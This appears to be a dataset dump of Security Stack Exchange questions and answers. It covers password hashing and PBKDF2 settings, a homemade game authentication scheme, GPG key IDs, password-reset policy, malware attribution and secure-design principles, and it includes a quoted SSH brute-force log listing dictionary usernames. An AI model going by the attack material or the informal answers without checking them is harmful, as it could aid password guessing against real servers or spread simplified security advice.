source_id
int64
1
4.64M
question
stringlengths
0
28.4k
response
stringlengths
0
28.8k
metadata
dict
109,709
I wanted to know if someone can log my keystrokes if i am on a virtual machine. Is it more secure to use a computer or a virtual machine on that computer.
RedGrittyBrick is right. Here's how it would work: Keylogger is on host machine: even VM sessions will be keylogged. Keylogger is on virtual machine: only VM will be keylogged unless it escapes the VM. Keylogger is hardware-based: same as #1: everything can be captured, but this includes things even outside of the main operating system, as long as it's all going to the hardware. This means anything on your machine, including BIOS passwords, boot passwords, disk encryption, etc.
{ "source": [ "https://security.stackexchange.com/questions/109709", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92713/" ] }
109,806
I am writing a multiplayer game. I have a central server which processes everything. For data exchange I use HTTPS protocol. Because this is a game I cannot use computationally expensive systems like RSA for data transfer. To login, Client uses sha512 to produce hexadecimal hash from password and random seed . Client sends "login" request with username, hash and seed to the server. Server checks if user has not attempted too many login requests and checks whether the password hash matches the hash made from the password in the database. If it does, it sends an access_key and a response that login was successful To send requests which require login, Client sends a hash generated from the access_key and seed along with the request data. Server checks whether the IP has not changed and whether the hash made from access_key and seed is correct. If it is, new access_key is generated from the old one, request data is processed and the server returns the new access_key along with the response from the request. At any time, if client's IP changes or invalid access_key is sent, the session is automatically terminated. How secure is this approach? What can I do to improve it?
First of, crypto is hard, and you shouldn't create your own . Vulnerabilities Your login seems to suffer from a pass the hash vulnerability . An attacker doesn't need to crack the hash to login, they can just pass the hash, and will be logged in. This defeats the purpose of hashing the password in the first place. sha512 is not recommended for storing passwords, as it's way too fast . Use something like bcrypt instead. HTTPS and Encryption You say that RSA is too expensive. But generally, RSA is only used to exchange a key, which is then used with a much less expensive private key cryptosystem. As you clarified that you do use HTTPS, it should be noted that you do already use RSA. HTTPS uses RSA or diffie hellman for key exchange and some block or stream cipher for the actual data encryption. As you use HTTPS, you already have data confidentiality and integrity (and server authentication and optionally client authentication), there is no need for additional encryption on the application level. Advantages of your scheme? Your scheme doesn't really seem to serve any purpose. You already are secure from eavesdropping and data tampering via HTTPS (and your scheme wouldn't have prevented it anyways). So your scheme doesn't seem to be about data exchange so much, as it is about authentication. Generally, authentication is handled like this: Login: Client sends username and password (plain) Server hashes password, and compares hash against hash in db Server sends session id back Other Requests: Client sends session id Server validates session id (optional) when session state changes, server regenerates session id Your approach is similar, but did introduce the pass the hash vulnerability, and contains a seed, which seems to be unnecessary and thus only complicates the scheme. It also regenerates the session id on each request, which isn't really needed and only seems to cause unnecessary overhead.
{ "source": [ "https://security.stackexchange.com/questions/109806", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96071/" ] }
109,821
I'm a Security Architect, and I'm used to defining the security of project as a specification that gets carried out by others. I have been recently tasked with teaching new coders how to design and program using the principles of "Secure by Design" (and in the near future "Privacy by Design"). I have 30-45 minutes (yeah, I know), and the talk needs to be language-agnostic. This means I need to present actionable rules than can be applied by the web devs, application devs, and infrastructure devs. I came up with 5 Basic Rules and a Supplement: Trust no internal/external input (covers sanitation, buffer overflows, etc.) Least Privilege for any entity, object or user Fail "no privilege" Secure, even if design is known/public Log so that someone unfamiliar with the system can audit every action Supplement: If you violate a Rule, prove the mitigation can survive future programmers adding functionality. Each of those rules can be augmented with examples from any language or application, for specific guidance. I believe this handles most of the general principles of "Secure by Design" from a high-level perspective. Have I missed anything?
The canonical resource for the concept of secure-by-design is "The Protection of Information in Computer Systems" by Saltzer and Schroeder. The essence is distilled into their 8 principles of secure design: Economy of mechanism Fail-safe defaults Complete mediation Open design Separation of privilege Least privilege Least common mechanism Psychological acceptability These principles, laid out in 1974, are still fully applicable today.
{ "source": [ "https://security.stackexchange.com/questions/109821", "https://security.stackexchange.com", "https://security.stackexchange.com/users/6253/" ] }
109,950
The internet is rife with 'authentication vs. authorization' -type questions. I'm not asking that here. I'm wondering if there is some overarching term that encompasses both of these. I've seen authentication referred to as 'identity management', and authorization referred to as 'access control'. But even AWS didn't have a good term for both of these together, so it created IAM. So again, if authentication is proving who (as a principal) you are, and authorization is about giving that authenticated principal access levels, then I'm looking for an umbrella security term that applies to both (hence, governing who can do what for a particular resource). Does this exist?!
According to CISSP study guide , access control include IAAA (Identification, Authentication, Authorization and Accountability). So if you dont care about the rest then you can call Authentication and Authorization as Access control . Where: Identification : User_Name Authentication : User_Name + Password ( in one factor auth , simple case) Authorization : Access to resources once authenticated Accounting : Tracking who did what
{ "source": [ "https://security.stackexchange.com/questions/109950", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96249/" ] }
109,961
I quite often see opportunities to optimise server-side code if HTML form names are exactly the same as the database field names they eventually update. The drawback obviously is that this is exposing information about the database structure in plain sight. Of course this information is only useful if other weakness exist but it does seem like handing information on a plate. I'd be interested to know if people think this is low risk and if they do expose field names like this without worrying.
It is very common to do this. As you've noticed, there is a significant benefit for keeping code simple. If you do have an SQL injection vulnerability, an attacker can figure out your database structure using INFORMATION_SCHEMA. So hiding your database structure doesn't help you a great deal. Another concern in this area is Mass assignment vulnerabilities . Perhaps a user is allowed to update their user details - name, email, password, etc. But they are not supposed to be able to update the field "is_admin". With code that automatically routes form fields to SQL statements, sometimes vulnerabilities like this can appear.
{ "source": [ "https://security.stackexchange.com/questions/109961", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92784/" ] }
110,084
I use PBKDF2 with SHA-256 to store hashes of passwords. I use the following parameters: number of iterations desired = 1024 length of the salt in bytes = 16 length of the derived key in bytes = 4096 But recently I found out that most probably the parameters are badly selected. For example wiki page says: standard was written in 2000, the recommended minimum number of iterations was 1000 .... As of 2005 a Kerberos standard recommended 4096 iterations which means that most probably I have to increase this number and The standard recommends a salt length of at least 64 bits Which means that my salt length is ok is too low (thanks to Neil Smithline). But when searching through the standard I was not able to find the mention about recommended salt length. When I looked for the length of the derived key and found this nice answer : If you use PBKDF2 for password hashing, then 12 bytes of output ought to be fine, with a non-negligible security margin it suggested me that I took too big number which probably does not make sense. So my question is : can anyone show good parameters (may be with some justifications/links) for this scenario of password hashing (as of 2016). Also can I guarantee that the derived key length will be always the same length as I ask?
Your starting point PBKDF2-HMAC-SHA-256 number of iterations desired = 1024 length of the salt in bytes = 16 length of the derived key in bytes = 4096 Algorithm Ok - PBKDF2-HMAC-SHA-256 is a solid choice, though if you're running on any modern 64-bit CPU, I would strongly recommend PBKDF2-HMAC-SHA-512 instead, because SHA-512 requires 64-bit operations that reduce the margin of a GPU based attacker's advantage, since modern GPU's don't do 64-bit as well. Salt 16 bytes of salt is fine, as long as it is cryptographically random and is unique per password. Normal recommendations are in the 12-24 byte range, with 16 considered quite solid. Output and Iterations 4096 bytes of output is ACTIVELY BAD! SHA-256 has a native output size of 32 bytes. PBKDF2/RFC2898 states that in this case, you'll first run 1024 iterations to get the first (leftmost) 32 bytes, then another 1024 iterations for the next 32 bytes, and so on for 128 times in total to get the full 4096 bytes of output you requested. So, you did 131072 iterations total, and got 4096 bytes of output. The attacker is going to do 1024 iterations total, and compare their 32 bytes of output to the first (leftmost) 32 bytes of your output - if those are the same, they guessed correctly! You just gave every attacker a 128:1 advantage! Instead, if you're happy with the speed, you should do 131072 iterations with 32 bytes of output - you will spend the SAME amount of time you are now (so it's free!), and your attackers will need to spend 128 times more time than they do now! NOTE: If you move to PBKDF2-HMAC-SHA-512, you can use up to 64 bytes of output, and each iteration will take slightly longer. Never get more output for password hashing than the native output of your hash function, i.e. 20 bytes for SHA-1, 32 for SHA-256, 64 for SHA-512. You can optionally store less, but it doesn't save you any computations. I would recommend storing at least 28 bytes of output (224 bits, which is twice 112 bits, the nominal security of 3DES). Note that output length values are pure binary output - BEFORE you BASE64 or hexify them, if you do (personally, I'd store the raw binary - it uses less space, and requires one less conversion).
{ "source": [ "https://security.stackexchange.com/questions/110084", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15912/" ] }
110,089
I have a question regarding Encryption. Say an attacker stole my entire database. In that database all the data was encrypted. If the attacker took one piece of encrypted data and for some reason knew the original value of this one piece of encrypted data, could he use that knowledge to workout a way to decrypt all the other data efficiently?
When used correctly, no. This is one of the tests for semantic security, in fact. In another form, if an attacker can choose a plaintext to be encrypted by you, with your secret key, he should not be able to learn anything about any other data you have encrypted with the same key. This is what is known as CPA-secure (chosen plaintext attack) and AES is believed to be (as far as we can tell) CPA-secure. So not only can an attacker not decrypt other data using this knowledge, he can't even learn anything about the other data with this knowledge.
{ "source": [ "https://security.stackexchange.com/questions/110089", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78210/" ] }
110,139
I generated a public key using GnuPG. I can see it using --list-keys $ gpg --list-keys /Users/mertnuhoglu/.gnupg/pubring.gpg ------------------------------------- pub 4096R/CB3AF6E6 2015-12-24 [expires: 2016-12-23] uid Mert Nuhoglu <[email protected]> sub 4096R/0D6B756F 2015-12-24 [expires: 2016-12-23] I want to share it on keyservers. This tutorial says I need to use the following command: gpg --send-keys 'Your Name' --keyserver hkp://subkeys.pgp.net I use that command, but I get the following error: $ gpg --send-keys 'Mert Nuhoglu' --keyserver hkp://subkeys.pgp.net gpg: "Mert Nuhoglu" not a key ID: skipping gpg: "--keyserver" not a key ID: skipping gpg: "hkp://subkeys.pgp.net" not a key ID: skipping What is key id exactly?
OpenPGP User IDs User IDs in OpenPGP are used to connect keys to entities like names and e-mail addresses. These are used to search for keys on key servers, and matching them to users/e-mail addresses. Be aware user IDs are not checked by key servers, make sure to verify them on your own! OpenPGP Key IDs OpenPGP key IDs (and fingerprints) are used to reference keys when performing several actions like requesting and sending keys, or when verifying ownership. For example, you'd exchange the fingerprint with the key's owner on a separate, trusted channel to make sure the key really belongs to the person that claims to own the key. The OpenPGP (v4) key ID is an identifier calculated from the public key and key creation timestamp. From those, a hashsum is calculated. The hex-encoded version is called the fingerprint of the key. The last (lower order) 16 characters are called the long key ID , if you only take the last eight characters, it's the short key ID . An example for my own public key: fingerprint: 0D69 E11F 12BD BA07 7B37 26AB 4E1F 799A A4FF 2279 long id: 4E1F 799A A4FF 2279 short id: A4FF 2279 The primary public key's ID is referenced in the pub line after the key size, in your case the short key ID is CB3AF6E6 : pub 4096R/CB3AF6E6 2015-12-24 [expires: 2016-12-23] Be aware the eight byte short key IDs do not provide a sufficiently large value space, and it is easily possible to generate duplicate keys through collision attacks . Instead of short key IDs, use at least long key IDs , and when software handles keys, always refer the whole fingerprint. For more details on how the hash sums are derived, I refer to RFC 4880, OpenPGP, 12.2. Key IDs and Fingerprints which also explains the differences for deprecated OpenPGP v3 keys. Sending and Receiving Keys From Key Servers To send or receive keys from key servers, you must use the full key ID or fingerprint. GnuPG does not accept user IDs here. From man gpg : --send-keys key IDs Similar to --export but sends the keys to a keyserver. Fingerprints may be used instead of key IDs. [...] --recv-keys key IDs Import the keys with the given key IDs from a keyserver. [...] If you want to search for a user ID (or parts of those) first, use gpg --search-keys . This will first query the key servers for the name, and provide some kind of assistant that asks you which keys to fetch afterwards (so, it will automatically run --recv-keys for the selected keys). --search-keys names Search the keyserver for the given names. Multiple names given here will be joined together to create the search string for the keyserver. [...]
{ "source": [ "https://security.stackexchange.com/questions/110139", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96428/" ] }
110,141
Is it possible to know whether a textfile, e.g. in XML format, has been edited or tampered with over time? The context to my question follows: I am a scientist in industry using a technology called 'mass spectrometry (MS)'. MS is an analytical technique used, e.g. in forensic analysis to determine whether a particular compound is present in a sample (e.g. drug of abuse in blood or urine). Mass spec. datafiles are usually stored in flat-file format to the instrument vendor's private binary specification - their software can process it, but nothing else can. However, open standards for MS data exist, and most vendors support export to at least one open specification. These open standards are mainly XML based these days (eg mzML ) and allow processing with open source applications, and also allow long-term storage (> 10 years) of the data in a format that doesn't require that we maintain an archived computer and the OS (or VM) and the processing software for long periods. The vendor binary format provides at least some security against data tampering, however the XML formats do not. Hence the issue - the open formats are very useful for providing access to data over archival timescales, but security is a problem.
The default solution would be to use cryptographic signatures. Have every technician generate a PGP keypair, publishing the public key and keeping the private key secure. When a technician made an analysis, they sign the result file with their private key. Now anyone who wants to verify the file can check the signature using the public key of the technician. When anyone changes the file, the signature won't be correct anymore. Security consideration : Should any private key of a technician get known to someone else, that person can change the files and also change the signature to one which will be valid. This problem can be mitigated by having multiple persons sign each result file. An attacker would require all keys to replace all signatures with valid ones. Alternative low-tech solution: Print out each result file, have the technician sign it the old-school way (with a pen) and deposit the file in a physically secure archive. By the way: Do not assume that the vendor-specific binary format provides any more security against tampering than XML does. Just because you can't read and edit it when you open it with a text editor doesn't mean nobody else can reverse-engineer the format and build an editor for it.
{ "source": [ "https://security.stackexchange.com/questions/110141", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96430/" ] }
110,172
I'm taking a course which is designed with the CISSP certification in mind. Though the class is categorized as software engineering, we talked a lot about physical security and, in particular, floods, fires, earthquakes and cars running into things. How is this security? For example we were told that data centres are safest in the middle of a building because if the roof was leaking the top wouldn't be safe, and water tends to go down so the lower floors would be the first to flood. Is this really a security issue? For example, if the roof leaks the engineer would be at fault, not the security analyst. You wouldn't hire a security analyst to make sure the roof is solid. UPDATE: Also, things like having bollards around a building to protect pedestrians from cars, how's this security? No one's really explained this yet. I was told the companies most valuable assets are their employees, but with this line of reasoning, what isn't security? If the availability is so encompassing, what isn't part of security?
All other answers are fine. I'm going to offer you a classic security perspective. Starting a fire/flood is a textbook scenario for physical penetration/exfiltration. People under stress are less likely to challenge strangers. A fire can be used to destroy forensic evidence, in particular when there's insider involvement. An earthquake or, indeed, any natural disaster (like bush fires) is a potential complication for security because law and order break down and looting rears its ugly head. Perimeter security against SVBIEDs is a necessary consideration in certain countries and threat environments. If a suicide car bomber can drive close to the walls of your data center, it is your failure as a security consultant. Hence bollards, flowerbeds, and concrete barriers. Security is a holistic discipline. Every specialist cares about bits and pieces of the enterprise, and by necessity of life loses sight of the whole. There should be at least one person out there who thinks in terms of adversary's behavior and not his/her own pigeonhole. Which, incidentally, is a security consultant's job description.
{ "source": [ "https://security.stackexchange.com/questions/110172", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10714/" ] }
110,258
I work for a help desk, and we recently launched an online service where our members can log in. A problem we are having is that users who are calling us often ask us to confirm that the password handed in to them is correct. By doing so, they disclose their password over the phone. How can we prevent this? It is mentioned in the sign up mail that they mustn't disclose their password, and we mention it whenever we feel they are going to disclose it to us. About the users: Around 90% of our callers are first time callers. Since they're doing it the first time they call, it's difficult to educate them. They are pensioners, so they usually have less experience of authenticated services than the average computer user.
Ensure there is a method for users to reset their own passwords, and make a policy whereby the helpdesk will initiate a password reset if a password is revealed to them. Users will tend to phone up when they can't log in, and therefore triggering the same password reset process as they can themselves results in them slowly learning that it doesn't help to phone up.
{ "source": [ "https://security.stackexchange.com/questions/110258", "https://security.stackexchange.com", "https://security.stackexchange.com/users/89900/" ] }
110,357
Can my password have more than one password combination? I read up on physical combination locks (the lock you open with numbers) and I learned that a combination lock can have more than one possible combinations. Also I had my first phone, a normal Nokia phone (not a smartphone) that was password protected and I was able to open the device with a password that was not really the exact password for the phone. Like, if the password was set to 4545 and I typed 1111 the phone still unlocked. Or if the phone password was set to 4114 and I typed, let's say, 2141, the phone still unlocked. The question is, if my password for my Laptop PC was !78ghA,NJ58*#3&* , is it possible that a next combination will work behind my back or will it work only if there is a vulnerability?
In most password-protected systems it usually is possible, but very unlikely. Behind many password validation mechanisms is the use of salted hash functions. For the sake of simplicity, let's forget about salt for a moment. When a user sets its password, hash(password) is stored in the database When the user logs in presenting password' , hash(password') is compared to hash(password) . If it matches, the user is allowed to log in. Let's remember, however, that hash functions get data of unlimited length and transform it to data of limited size, ex. 128 bits. Therefore, it is not hard to understand that there can be more than one message that produces the same hash from a given function. That is called collision and it is what you are concerned about. The thing is that hash functions are produced to be so random that you should not find or produce a collision easily. It is theoretically "possible", but practically "impossible", if you are using a good modern hash function.
{ "source": [ "https://security.stackexchange.com/questions/110357", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94833/" ] }
110,379
Let's say that in the password policy the password history is defined to remember the last 10 passwords. I understand password history exists so that if a password is recovered from a compromised database by some attacker, chances are way less likely that password is actually the user's current password. However, if upon periodic password reset, the users simply appends '1' to his old password, and on the next period reset he appends let's say '2', this greatly decreases the effectiveness of periodic password resets. As soon as the attacker recovers two old passwords of the same user in clear text, he will see the pattern and can guess the actual current password of the user... The best practice is to hash (+ salt) passwords, however as far as I can see this makes it impossible to check whether the user simply appended a single digit to his old password or not. The passwords could be encrypted instead of hashed, which would address my concern, however I don't like the idea of passwords being reversible to plain text without bruteforce attacks. I am wondering what the best solution would be to prevent users from making this minor changes to their old password when resetting it? Can it be technically achieved in a very secure manner, or does this definitely require user awareness?
You can't. Your users are doing this because the reset mechanism has become obtrusive to them getting work done. People are clever enough to get around any of the mechanisms you're going to devise. Those that aren't will quickly learn from those that are. Information like this travels fast. If you somehow were to figure out how to counter the password1 password2 password3 scheme that people commonly use, you'll almost instantly be confronted with a new scheme. 1password 2password 3password. Now you see a NEW pattern, and simply iterate all numbers. So the user comes up with a yet better scheme. passwordA passwordB passwordC. You'll spend weeks coming up with a counter-measure, only to be defeated in 10 minutes by a clever person who thought of something you didn't. The point being, that the users ability and cost to get past your counter-measures far outweigh your ability to continually develop new schemes to try to prevent them. The solution is simply to stop seeing your users as adversaries who you're trying to defeat. They aren't. Users are simply trying to get things done, and you've put up a barrier to do so. If this really bothers you so much, you need to adjust your attitude towards the users and work with them to come up with something that suits BOTH your needs, and doesn't create an adversarial relationship.
{ "source": [ "https://security.stackexchange.com/questions/110379", "https://security.stackexchange.com", "https://security.stackexchange.com/users/25125/" ] }
110,415
I understand why the password should be salted and hashed before being saved into the database, but my question is if it needs to be hashed on the browser side or just sending plain-text password over HTTPS is considered to be secure. If it is ok, is there any document which I can use to prove to my client that the system is secure? If it's not, what are the best practices?
It is standard practice to send "plaintext" passwords over HTTPS. The passwords are ultimately not plaintext, since the client-server communication is encrypted as per TLS. Encrypting the password before sending it in HTTPS doesn't accomplish much: if the attacker got their hands on the encrypted password they could simply use it as if it were the actual password, the server wouldn't know the difference. The only advantage it would provide is protecting users that use the same password for multiple sites, but it wouldn't make your site any safer.
{ "source": [ "https://security.stackexchange.com/questions/110415", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96738/" ] }
110,493
A design pattern I've noticed on internet banking sites is that you get automatically logged out and sent to a warning page if/when you hit the back button on your browser, ending your session and obliging you to log in again. I'm presuming this is due to some sort of security consideration, but I'm at a loss to figure out what. What is the rationale for this behaviour?
A scenario such banks might want to protect you from could be this: you visit your banking website and do your banking stuff. after you are finished you log out and then navigate to some other website to look at cat pictures or whatever. you leave your computer with the cat picture website open. Because there is nothing incriminating on your screen, you feel safe doing that. your evil roommate comes along and presses the back button a few times. they arrive at the cached version of your banking site, see your bank account and see that you still haven't paid your share of the rent even though you clearly have enough money to do that. That's one reason why banking websites do not work when you navigate to them using the browsers back button. But an even more likely reason could be laziness on the side of the web developers. Allowing the user to use back and forward navigation creates an additional variable in a web application which needs to be kept in mind at all times. Simply making this impossible removes that variable and makes it far easier for the developers to create a secure and bug-free application. Because bugs in banking applications can cause quite a lot of financial damage, developers in that sector are rather conservative and tend to limit usability when it results in a more predictable application use-pattern.
{ "source": [ "https://security.stackexchange.com/questions/110493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/21695/" ] }
110,600
When a new piece of malware appears, people can try to determine where it comes from, and who its authors could be. How do security experts attempt to identify the authors of a new publicly disclosed piece of malware? What techniques (e.g. reverse engineering) are available?
There are a number of different techniques, depending on the skill level of the malware author: Embedded metadata - compiled programs can contain details about their authors. This is most commonly seen in legitimate programs, and shows in the details screen if you look in Windows properties. Attackers who are out for fame might well put identifying details in these fields Accidental embedding - compilers will often include details on compiler flags used, which may well include paths to source files. If the source file was in /users/evilbob/malware , you can make a pretty good guess that evil bob wrote it. There are ways to turn off these inclusions, but everyone makes mistakes sometimes Common code - malware authors are like any other programmer, and will reuse useful bits of code from previous work. It is sometimes possible to spot that a section of compiled code matches a previously discovered section of code so closely that it seems probable that the same source code was used for each. If that is the case, can deduce that the second author had access to the code from the first, or may be the same person. Common toolchain - if a developer tends to use Visual Studio, it would be unexpected to see their code turning up compiled with GCC. If they use a specific packer, it would be strange to see them using a different packer. It's not perfect, but it could suggest a distinction. Common techniques - similar to the above, coders often have specific patterns of coding. People are unlikely to switch patterns, so you can make a reasonable guess that if some compiled code couldn't have been generated in a particular coding style, it probably wasn't written by someone who has previously been known to use a different style. This is much easier with interpreted languages, as seeing consistent use of, say, for loops rather than while loops is easier than spotting the differences between the compiled output of each (modern compilers may well reduce them to exactly the same set of instructions). Malware origin - where did it come from? Does it have any text in specific languages, or typos which suggest a particular background? (e.g. colour would suggest that the author wasn't American, generale might suggest someone used to writing in a Romance language such as French or Italian) None of these are on their own enough to determine an author, but combined, they might suggest a common author with previous malware, or even with other known code (e.g. from OS projects).
{ "source": [ "https://security.stackexchange.com/questions/110600", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96683/" ] }
110,676
I am a manager in an office where the company does not provide a company email, so I use my personal email. Often, I will receive jobs lists by email from my general manager. How should I log in to my email in front of my co-workers so that they don't see my password? My email service uses end to end encryption, which means that it does not store or reset my password. I also cannot move the screen so my co-workers cannot see it.
Use the blanket of security, as seen in the Snowden documentary Citizenfour. It involves placing a blanket over your head, the keyboard and monitor and typing in the password. It will look weird but for security's sake it may be worth it. Related post with demo pic - In CitizenFour, what was Edward Snowden mitigating with a head blanket?
{ "source": [ "https://security.stackexchange.com/questions/110676", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96987/" ] }
110,706
When checking the auth log of a server with the command: grep sshd.\*Failed /var/log/auth.log | less I see thousands of lines like this: Jan 12 11:27:10 ubuntu-leno1 sshd[8423]: Failed password for invalid user admins from 172.25.1.1 port 44216 ssh2 Jan 12 11:27:13 ubuntu-leno1 sshd[8425]: Failed password for invalid user phoenix from 172.25.1.1 port 20532 ssh2 Jan 12 11:27:17 ubuntu-leno1 sshd[8428]: Failed password for invalid user piglet from 172.25.1.1 port 24492 ssh2 Jan 12 11:27:22 ubuntu-leno1 sshd[8430]: Failed password for invalid user rainbow from 172.25.1.1 port 46591 ssh2 Jan 12 11:27:25 ubuntu-leno1 sshd[8432]: Failed password for invalid user runner from 172.25.1.1 port 57129 ssh2 Jan 12 11:27:34 ubuntu-leno1 sshd[8434]: Failed password for invalid user sam from 172.25.1.1 port 11960 ssh2 Jan 12 11:27:37 ubuntu-leno1 sshd[8437]: Failed password for invalid user abc123 from 172.25.1.1 port 5921 ssh2 Jan 12 11:27:40 ubuntu-leno1 sshd[8439]: Failed password for invalid user passwd from 172.25.1.1 port 21208 ssh2 Jan 12 11:27:43 ubuntu-leno1 sshd[8441]: Failed password for invalid user newpass from 172.25.1.1 port 65416 ssh2 Jan 12 11:27:46 ubuntu-leno1 sshd[8445]: Failed password for invalid user newpass from 172.25.1.1 port 26332 ssh2 Jan 12 11:27:49 ubuntu-leno1 sshd[8447]: Failed password for invalid user notused from 172.25.1.1 port 51126 ssh2 Jan 12 11:27:52 ubuntu-leno1 sshd[8449]: Failed password for invalid user Hockey from 172.25.1.1 port 14949 ssh2 Jan 12 11:27:56 ubuntu-leno1 sshd[8451]: Failed password for invalid user internet from 172.25.1.1 port 35105 ssh2 Jan 12 11:27:59 ubuntu-leno1 sshd[8453]: Failed password for invalid user asshole from 172.25.1.1 port 7916 ssh2 Jan 12 11:28:02 ubuntu-leno1 sshd[8456]: Failed password for invalid user Maddock from 172.25.1.1 port 26431 ssh2 Jan 12 11:28:05 ubuntu-leno1 sshd[8458]: Failed password for invalid user Maddock from 172.25.1.1 port 53406 ssh2 Jan 12 11:28:09 ubuntu-leno1 sshd[8460]: Failed password for invalid user computer from 172.25.1.1 port 23350 ssh2 Jan 12 11:28:15 ubuntu-leno1 sshd[8462]: Failed password for invalid user Mickey from 172.25.1.1 port 37232 ssh2 Jan 12 11:28:19 ubuntu-leno1 sshd[8465]: Failed password for invalid user qwerty from 172.25.1.1 port 16474 ssh2 Jan 12 11:28:22 ubuntu-leno1 sshd[8467]: Failed password for invalid user fiction from 172.25.1.1 port 29600 ssh2 Jan 12 11:28:26 ubuntu-leno1 sshd[8469]: Failed password for invalid user orange from 172.25.1.1 port 44845 ssh2 Jan 12 11:28:30 ubuntu-leno1 sshd[8471]: Failed password for invalid user tigger from 172.25.1.1 port 12038 ssh2 Jan 12 11:28:33 ubuntu-leno1 sshd[8474]: Failed password for invalid user wheeling from 172.25.1.1 port 49099 ssh2 Jan 12 11:28:36 ubuntu-leno1 sshd[8476]: Failed password for invalid user mustang from 172.25.1.1 port 29364 ssh2 Jan 12 11:28:39 ubuntu-leno1 sshd[8478]: Failed password for invalid user admin from 172.25.1.1 port 23734 ssh2 Jan 12 11:28:42 ubuntu-leno1 sshd[8480]: Failed password for invalid user jennifer from 172.25.1.1 port 15409 ssh2 Jan 12 11:28:46 ubuntu-leno1 sshd[8483]: Failed password for invalid user admin from 172.25.1.1 port 40680 ssh2 Jan 12 11:28:48 ubuntu-leno1 sshd[8485]: Failed password for invalid user money from 172.25.1.1 port 27060 ssh2 Jan 12 11:28:52 ubuntu-leno1 sshd[8487]: Failed password for invalid user Justin from 172.25.1.1 port 17696 ssh2 Jan 12 11:28:55 ubuntu-leno1 sshd[8489]: Failed password for invalid user admin from 172.25.1.1 port 50546 ssh2 Jan 12 11:28:58 ubuntu-leno1 sshd[8491]: Failed password for root from 172.25.1.1 port 43559 ssh2 Jan 12 11:29:01 ubuntu-leno1 sshd[8494]: Failed password for invalid user admin from 172.25.1.1 port 11206 ssh2 Jan 12 11:29:04 ubuntu-leno1 sshd[8496]: Failed password for invalid user chris from 172.25.1.1 port 63459 ssh2 Jan 12 11:29:08 ubuntu-leno1 sshd[8498]: Failed password for invalid user david from 172.25.1.1 port 52512 ssh2 Jan 12 11:29:11 ubuntu-leno1 sshd[8500]: Failed password for invalid user foobar from 172.25.1.1 port 35772 ssh2 Jan 12 11:29:14 ubuntu-leno1 sshd[8502]: Failed password for invalid user buster from 172.25.1.1 port 18745 ssh2 Jan 12 11:29:17 ubuntu-leno1 sshd[8505]: Failed password for invalid user harley from 172.25.1.1 port 38893 ssh2 Jan 12 11:29:20 ubuntu-leno1 sshd[8507]: Failed password for invalid user jordan from 172.25.1.1 port 64367 ssh2 Jan 12 11:29:24 ubuntu-leno1 sshd[8509]: Failed password for invalid user stupid from 172.25.1.1 port 27740 ssh2 Jan 12 11:29:27 ubuntu-leno1 sshd[8511]: Failed password for invalid user apple from 172.25.1.1 port 22873 ssh2 Jan 12 11:29:30 ubuntu-leno1 sshd[8514]: Failed password for invalid user fred from 172.25.1.1 port 54420 ssh2 Jan 12 11:29:33 ubuntu-leno1 sshd[8516]: Failed password for invalid user admin from 172.25.1.1 port 58507 ssh2 Jan 12 11:29:42 ubuntu-leno1 sshd[8518]: Failed password for invalid user summer from 172.25.1.1 port 48271 ssh2 Jan 12 11:29:45 ubuntu-leno1 sshd[8520]: Failed password for invalid user sunshine from 172.25.1.1 port 5645 ssh2 Jan 12 11:29:53 ubuntu-leno1 sshd[8523]: Failed password for invalid user andrew from 172.25.1.1 port 44522 ssh2 It seems that I'm experiencing an ssh brute force attack. Is this a common occurrence, or am I being specifically targeted? What should I do now? Should I consider the attack successful and take measures? -----Edit------- The fact that the attack comes from an internal IP address is explained by this server having a ssh redirection from outside. It happened really quickly after opening the port, are every public IP scanned in the wild in search of an existing server behind ?
Yes it looks like you are experiencing a brute force attack. The attacker is in on a class B private address, so it is likely to be someone with access to your organization's network that is conducting the attack. From the usernames it looks like they are running though a dictionary of common usernames. Have a look at 'How to stop/prevent SSH bruteforce' (Serverfault) and 'Preventing brute force SSH attacks' (Rimu Hosting) on how to take measures to mitigate some of the risk relating to SSH bruteforce attacks.
{ "source": [ "https://security.stackexchange.com/questions/110706", "https://security.stackexchange.com", "https://security.stackexchange.com/users/97016/" ] }
110,723
I am working on a multiplayer game. I intended for all data to be exchanged over HTTPS, but it is way too slow. High latency networks take over a second for SSL handshake. While the game is turn-based and does not require blazing-fast data transfer, 1000-2000 ms ping is still unacceptable. What protocols/approaches can I use to transfer data securely, with as low latency as possible? Edit: Just to respond to your enquiries about the payload, here is what the result of a unit attacking an enemy building (obviously I'm not sending a string of ones and zeros, this is just a binary representation): 00000000 10010011 01010001 00100011 01011100 01010001 01010000 Message breakdown: 00000000 client's request executed with status "OK", other values correspond to specific error messages. 10 Object is owned by Player 2 010 Object is a building 0110 Object is located at x=6 (always 0<=x<=14) 101 Object is located at y=5 (always 0<=y<=6), owner and location is sufficient to describe any object uniquely 0001 1 byte-worth of modified attributes follows 0010 0011 Object's health is now 3 01 Object is owned by Player 1 011 Object is a unit 1000 Object is located at x=8 101 Object is located at y=5 0001 1 byte-worth of modified attributes follows 0101 0000 This object can no longer move/attack this turn I don't think that I can get any more data density without making it expensive on the CPU.
HTTPS is HTTP over TLS . If you implement a game, using HTTP is usually not a good idea. The HTTP protocol is designed for requesting documents, not for real-time games. A better idea would be to develop your own protocol directly based on TCP or UDP (UDP is faster while TCP is easier to use, but that's a topic for game development stackexchange ) and tunnel it through TLS. The time-consuming key exchange process only needs to happen once when establishing the connection. When you keep the same connection open during the game, the only latency overhead is caused by encryption and decryption. TLS supports multiple cipher suites (sets of cryptographic algorithms which are used). The choice of cipher suite can be used to find a compromise between performance and security.
{ "source": [ "https://security.stackexchange.com/questions/110723", "https://security.stackexchange.com", "https://security.stackexchange.com/users/96071/" ] }
110,734
